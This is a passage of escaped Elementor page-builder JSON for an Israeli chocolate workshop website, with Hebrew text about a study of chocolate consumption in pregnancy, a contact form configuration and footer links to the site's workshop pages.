\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"71c4466d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"5c8ffdc1\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48141d39\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"50bf4905\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"d5a34b\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"60b32fa\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"f297d92\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"e0d5494\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e2\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d4\\u05e8\\u05d9\\u05d5\\u05df\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f9a6523\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/pregnent-choclate.jpg\",\"id\":154},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"eef1985\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-size: 1rem;\\\">\\u05ea\\u05d5\\u05e6\\u05d0\\u05d5\\u05ea \\u05de\\u05d7\\u05e7\\u05e8 \\u05d7\\u05d3\\u05e9 \\u05e6\\u05e4\\u05d5\\u05d9\\u05d5\\u05ea \\u05dc\\u05d4\\u05ea\\u05e7\\u05d1\\u05dc \\u05d1\\u05d1\\u05e8\\u05db\\u05d4 \\u05d7\\u05de\\u05d4 \\u05e2\\u05dc \\u05d9\\u05d3\\u05d9 \\u05d0\\u05de\\u05d4\\u05d5\\u05ea \\u05dc\\u05e2\\u05ea\\u05d9\\u05d3, \\u05d1\\u05d4\\u05ea\\u05d7\\u05e9\\u05d1 \\u05d1\\u05e8\\u05e9\\u05d9\\u05de\\u05d4 \\u05d4\\u05d0\\u05e8\\u05d5\\u05db\\u05d4 \\u05e9\\u05dc \\u05d4\\u05de\\u05d6\\u05d5\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05dd \\u05d4\\u05df \\u05de\\u05ea\\u05d1\\u05e7\\u05e9\\u05d5\\u05ea \\u05dc\\u05d4\\u05d9\\u05de\\u05e0\\u05e2 \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05d4\\u05d4\\u05d9\\u05e8\\u05d9\\u05d5\\u05df. \\u05d1\\u05e2\\u05d5\\u05d3 \\u05e9\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05de\\u05e8\\u05d1\\u05d4 \\u05d4\\u05de\\u05d6\\u05dc, \\u05e0\\u05e2\\u05d3\\u05e8 \\u05de\\u05e8\\u05e9\\u05d9\\u05de\\u05d4 \\u05d6\\u05d5, \\u05de\\u05d5\\u05de\\u05dc\\u05e5 \\u05dc\\u05e0\\u05e9\\u05d9\\u05dd \\u05d4\\u05e8\\u05d5\\u05ea \\u05dc\\u05d4\\u05d9\\u05de\\u05e0\\u05e2 \\u05de\\u05e8\\u05db\\u05d9\\u05d1\\u05d9\\u05dd \\u05de\\u05d5\\u05e1\\u05e4\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05db\\u05d2\\u05d5\\u05df \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d8\\u05e2\\u05dd \\u05d4\\u05de\\u05db\\u05d9\\u05dc\\u05d9\\u05dd \\u05e9\\u05d5\\u05de\\u05df, \\u05e1\\u05d5\\u05db\\u05e8 \\u05d5\\u05e7\\u05e4\\u05d0\\u05d9\\u05df.<\\/span><\\/p><p>\\u05d0\\u05da \\u05e7\\u05d9\\u05d9\\u05de\\u05d9\\u05dd \\u05d9\\u05ea\\u05e8\\u05d5\\u05e0\\u05d5\\u05ea \\u05e8\\u05d1\\u05d9\\u05dd \\u05e0\\u05dc\\u05d5\\u05d5\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d9\\u05db\\u05d4 \\u05de\\u05ea\\u05d5\\u05e0\\u05d4 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d5\\u05d0 \\u05de\\u05db\\u05d9\\u05dc \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d8\\u05e2\\u05dd \\u05de\\u05e1\\u05d5\\u05d2 \\u05e4\\u05dc\\u05d1\\u05e0\\u05d5\\u05d0\\u05d9\\u05d3\\u05d9\\u05dd, \\u05d4\\u05e0\\u05e7\\u05e9\\u05e8\\u05d9\\u05dd \\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05df \\u05de\\u05d5\\u05e4\\u05d7\\u05ea \\u05dc\\u05d1\\u05e2\\u05d9\\u05d5\\u05ea \\u05dc\\u05d1 \\u05d5\\u05db\\u05dc\\u05d9 \\u05d3\\u05dd \\u05d5\\u05db\\u05d5\\u05dc\\u05e1\\u05d8\\u05e8\\u05d5\\u05dc \\u05e0\\u05de\\u05d5\\u05da. \\u05db\\u05db\\u05dc \\u05e9\\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05d4\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8, \\u05db\\u05da \\u05d4\\u05d5\\u05d0 \\u05de\\u05db\\u05d9\\u05dc \\u05d9\\u05d5\\u05ea\\u05e8 \\u05e4\\u05dc\\u05d1\\u05e0\\u05d5\\u05d0\\u05d9\\u05d3\\u05d9\\u05dd.<\\/p><p>\\u05d2\\u05dd \\u05de\\u05d7\\u05e7\\u05e8\\u05d9\\u05dd \\u05e7\\u05d5\\u05d3\\u05de\\u05d9\\u05dd \\u05d4\\u05e8\\u05d0\\u05d5 \\u05e9\\u05e6\\u05e8\\u05d9\\u05db\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05ea\\u05d5\\u05e0\\u05d4 \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05d4\\u05d4\\u05d9\\u05e8\\u05d9\\u05d5\\u05df \\u05e2\\u05e9\\u05d5\\u05d9\\u05d4 \\u05dc\\u05d4\\u05d5\\u05e8\\u05d9\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05db\\u05d5\\u05df \\u05dc\\u05e8\\u05e2\\u05dc\\u05ea \\u05d4\\u05e8\\u05d9\\u05d5\\u05df, \\u05de\\u05e6\\u05d1 \\u05d1\\u05d5 \\u05d0\\u05e1\\u05e4\\u05e7\\u05ea \\u05d4\\u05d3\\u05dd \\u05dc\\u05e2\\u05d5\\u05d1\\u05e8 \\u05de\\u05e6\\u05d8\\u05de\\u05e6\\u05de\\u05ea \\u05d1\\u05d2\\u05dc\\u05dc \\u05dc\\u05d7\\u05e5 \\u05d4\\u05d3\\u05dd \\u05d4\\u05d2\\u05d1\\u05d5\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d0\\u05dd.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d4\\u05e8\\u05d9\\u05d5\\u05df: \\u05d4\\u05de\\u05d7\\u05e7\\u05e8<\\/strong><\\/h2><p>\\u05d4\\u05d7\\u05d5\\u05e7\\u05e8\\u05d9\\u05dd \\u05e2\\u05e7\\u05d1\\u05d5 \\u05d0\\u05d7\\u05e8 129 \\u05e0\\u05e9\\u05d9\\u05dd \\u05d4\\u05e8\\u05d5\\u05ea \\u05e2\\u05dd \\u05d4\\u05e8\\u05d9\\u05d5\\u05df \\u05d9\\u05d7\\u05d9\\u05d3, \\u05e9\\u05e0\\u05de\\u05e6\\u05d0\\u05d5 \\u05d1\\u05d9\\u05df \\u05d4\\u05e9\\u05d1\\u05d5\\u05e2\\u05d5\\u05ea \\u05d4-11-14 \\u05dc\\u05d4\\u05e8\\u05d9\\u05d5\\u05e0\\u05df. \\u05db\\u05dc \\u05d4\\u05e0\\u05e9\\u05d9\\u05dd \\u05e2\\u05d1\\u05e8\\u05d5 \\u05d1\\u05d3\\u05d9\\u05e7\\u05d5\\u05ea \\u05d3\\u05d5\\u05e4\\u05e7 \\u05d1\\u05ea\\u05d7\\u05d9\\u05dc\\u05ea \\u05d4\\u05de\\u05d7\\u05e7\\u05e8, \\u05db\\u05de\\u05d5 \\u05d2\\u05dd \\u05d1\\u05d3\\u05d9\\u05e7\\u05d5\\u05ea \\u05d6\\u05e8\\u05d9\\u05de\\u05ea \\u05d4\\u05d3\\u05dd \\u05d4\\u05e8\\u05d7\\u05de\\u05d9\\u05ea, \\u05d4\\u05e9\\u05dc\\u05d9\\u05d4 \\u05d5\\u05d4\\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05ea. \\u05d4\\u05e0\\u05ea\\u05d5\\u05e0\\u05d9\\u05dd \\u05e9\\u05d9\\u05de\\u05e9\\u05d5 \\u05db\\u05e1\\u05de\\u05df \\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05df \\u05dc\\u05e8\\u05e2\\u05dc\\u05ea \\u05d4\\u05e8\\u05d9\\u05d5\\u05df, \\u05d9\\u05ea\\u05e8 \\u05dc\\u05d7\\u05e5 \\u05d3\\u05dd \\u05d5\\u05ea\\u05d5\\u05e6\\u05d0\\u05d5\\u05ea \\u05e9\\u05dc\\u05d9\\u05dc\\u05d9\\u05d5\\u05ea \\u05d0\\u05e4\\u05e9\\u05e8\\u05d9\\u05d5\\u05ea \\u05d0\\u05d7\\u05e8\\u05d5\\u05ea \\u05e9\\u05dc \\u05d4\\u05d4\\u05d9\\u05e8\\u05d9\\u05d5\\u05df.<\\/p><p>\\u05d4\\u05d0\\u05de\\u05d4\\u05d5\\u05ea \\u05d4\\u05d4\\u05e8\\u05d5\\u05ea \\u05d7\\u05d5\\u05dc\\u05e7\\u05d5 \\u05d1\\u05d0\\u05e7\\u05e8\\u05d0\\u05d9 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05e9\\u05e7\\u05d9\\u05d1\\u05dc\\u05d5 \\u05e9\\u05dc\\u05d5\\u05e9\\u05d9\\u05dd \\u05d2\\u05e8\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d3\\u05dc\\u05d9\\u05dc \\u05d1\\u05e4\\u05dc\\u05d1\\u05e0\\u05d5\\u05d0\\u05d9\\u05d3\\u05d9\\u05dd \\u05de\\u05d3\\u05d9 \\u05d9\\u05d5\\u05dd, \\u05d1\\u05de\\u05e9\\u05da \\u05e9\\u05dc\\u05d5\\u05e9\\u05d4 \\u05d7\\u05d5\\u05d3\\u05e9\\u05d9\\u05dd. \\u05d4\\u05dd \\u05e2\\u05d1\\u05e8\\u05d5 \\u05d1\\u05d3\\u05d9\\u05e7\\u05d5\\u05ea \\u05e2\\u05d5\\u05e8\\u05e7\\u05d9\\u05dd \\u05e0\\u05d5\\u05e1\\u05e4\\u05d5\\u05ea \\u05d1\\u05ea\\u05d5\\u05dd \\u05e9\\u05dc\\u05d5\\u05e9\\u05ea \\u05d4\\u05d7\\u05d5\\u05d3\\u05e9\\u05d9\\u05dd, \\u05d5\\u05e0\\u05de\\u05e6\\u05d0\\u05d5 \\u05d1\\u05de\\u05e2\\u05e7\\u05d1 \\u05e2\\u05d3 \\u05d4\\u05dc\\u05d9\\u05d3\\u05d4.<\\/p><h2><strong>\\u05d4\\u05de\\u05de\\u05e6\\u05d0\\u05d9\\u05dd: \\u05db\\u05dc \\u05ea\\u05db\\u05d5\\u05dc\\u05d4 \\u05e9\\u05dc \\u05e4\\u05dc\\u05d1\\u05e0\\u05d5\\u05d0\\u05d9\\u05d3\\u05d9\\u05dd \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05dc\\u05e2\\u05d5\\u05d1\\u05e8<\\/strong><\\/h2><p>\\u05d4\\u05d7\\u05d5\\u05e7\\u05e8\\u05d9\\u05dd \\u05d2\\u05d9\\u05dc\\u05d5 \\u05db\\u05d9 \\u05dc\\u05d0 \\u05e0\\u05de\\u05e6\\u05d0\\u05d5 \\u05d4\\u05d1\\u05d3\\u05dc\\u05d9\\u05dd \\u05de\\u05d1\\u05d7\\u05d9\\u05e0\\u05ea \\u05e8\\u05e2\\u05dc\\u05ea \\u05d4\\u05e8\\u05d9\\u05d5\\u05df, \\u05dc\\u05d7\\u05e5 \\u05d9\\u05ea\\u05e8 \\u05e9\\u05dc \\u05d4\\u05e8\\u05d9\\u05d5\\u05df, \\u05de\\u05e9\\u05e7\\u05dc \\u05d4\\u05e9\\u05dc\\u05d9\\u05d4 \\u05d5\\u05de\\u05e9\\u05e7\\u05dc \\u05d4\\u05dc\\u05d9\\u05d3\\u05d4 \\u05d1\\u05d9\\u05df \\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05d4\\u05e0\\u05e9\\u05d9\\u05dd \\u05e9\\u05e7\\u05d9\\u05d1\\u05dc\\u05d5 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05d4\\u05db\\u05d9\\u05dc\\u05d5 \\u05e8\\u05de\\u05d5\\u05ea \\u05e0\\u05de\\u05d5\\u05db\\u05ea \\u05e9\\u05dc \\u05e4\\u05dc\\u05d1\\u05e0\\u05d5\\u05d0\\u05d9\\u05d3\\u05d9\\u05dd, \\u05dc\\u05d1\\u05d9\\u05df \\u05d4\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05e9\\u05e7\\u05d9\\u05d1\\u05dc\\u05d5 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e8\\u05de\\u05d5\\u05ea \\u05d2\\u05d1\\u05d5\\u05d4\\u05d5\\u05ea \\u05e9\\u05dc \\u05e4\\u05dc\\u05d1\\u05e0\\u05d5\\u05d0\\u05d9\\u05d3\\u05d9\\u05dd. \\u05e6\\u05d5\\u05d5\\u05ea \\u05d4\\u05de\\u05d3\\u05e2\\u05e0\\u05d9\\u05dd \\u05de\\u05e6\\u05d9\\u05d9\\u05df \\u05e9\\u05ea\\u05d5\\u05e6\\u05d0\\u05d5\\u05ea \\u05d0\\u05dc\\u05d5 \\u05d4\\u05d9\\u05d5 \\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d5\\u05ea \\u05de\\u05d4\\u05e6\\u05e4\\u05d5\\u05d9 \\u05d1\\u05e8\\u05d5\\u05d1 \\u05d4\\u05de\\u05e7\\u05e8\\u05d9\\u05dd \\u05d1\\u05e7\\u05e8\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc\\u05d5\\u05e1\\u05d9\\u05d9\\u05d4 \\u05d4\\u05db\\u05dc\\u05dc\\u05d9\\u05ea.<\\/p><p>\\u05dc\\u05d3\\u05d1\\u05e8\\u05d9\\u05d4\\u05dd, \\u05de\\u05d7\\u05e7\\u05e8 \\u05d6\\u05d4 \\u05de\\u05e6\\u05d1\\u05d9\\u05e2 \\u05e2\\u05dc \\u05db\\u05da \\u05e9\\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d4\\u05e9\\u05e4\\u05e2\\u05d4 \\u05d7\\u05d9\\u05d5\\u05d1\\u05d9\\u05ea \\u05e2\\u05dc \\u05d4\\u05e9\\u05dc\\u05d9\\u05d4 \\u05d5\\u05e2\\u05dc \\u05d4\\u05ea\\u05e4\\u05ea\\u05d7\\u05d5\\u05ea \\u05d4\\u05e2\\u05d5\\u05d1\\u05e8 \\u05dc\\u05d0 \\u05e8\\u05e7 \\u05d1\\u05de\\u05d9\\u05e9\\u05e8\\u05d9\\u05df, \\u05d0\\u05dc\\u05d0 \\u05d0\\u05e3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d9\\u05e9\\u05d9\\u05e8\\u05d4 \\u05e2\\u05e7\\u05d1 \\u05ea\\u05db\\u05d5\\u05dc\\u05ea \\u05d4\\u05e4\\u05dc\\u05d1\\u05e0\\u05d5\\u05d0\\u05d9\\u05d3\\u05d9\\u05dd.<\\/p><p>\\u05d4\\u05dd \\u05de\\u05d5\\u05e1\\u05d9\\u05e4\\u05d9\\u05dd \\u05db\\u05d9 \\u05d4\\u05e6\\u05e2\\u05d3 \\u05d4\\u05d1\\u05d0 \\u05e9\\u05dc \\u05d4\\u05e6\\u05d5\\u05d5\\u05ea \\u05d4\\u05d5\\u05d0 \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e0\\u05d9\\u05e1\\u05d5\\u05d9 \\u05d1\\u05d9\\u05e7\\u05d5\\u05e8\\u05ea \\u05d0\\u05e7\\u05e8\\u05d0\\u05d9 \\u05d2\\u05d3\\u05d5\\u05dc \\u05db\\u05d3\\u05d9 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e2 \\u05d8\\u05d5\\u05d1 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d4\\u05d0\\u05dd \\u05e6\\u05e8\\u05d9\\u05db\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e7\\u05e8\\u05d1 \\u05e0\\u05e9\\u05d9\\u05dd \\u05d4\\u05e8\\u05d5\\u05ea \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05e4\\u05d7\\u05d9\\u05ea \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05db\\u05d5\\u05df \\u05dc\\u05e8\\u05e2\\u05dc\\u05ea \\u05d4\\u05e8\\u05d9\\u05d5\\u05df \\u05d5\\u05d4\\u05e4\\u05e8\\u05e2\\u05d5\\u05ea \\u05d9\\u05ea\\u05e8 \\u05dc\\u05d7\\u05e5 \\u05d3\\u05dd \\u05d4\\u05e7\\u05e9\\u05d5\\u05e8\\u05d9\\u05dd \\u05dc\\u05d4\\u05e8\\u05d9\\u05d5\\u05df.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"97fc875\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9efbb93\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"31e0ebc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e6\\u05d3\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34056794\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"79ba6502\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c9740a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"62d9ea7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2a4010bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"527df496\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea 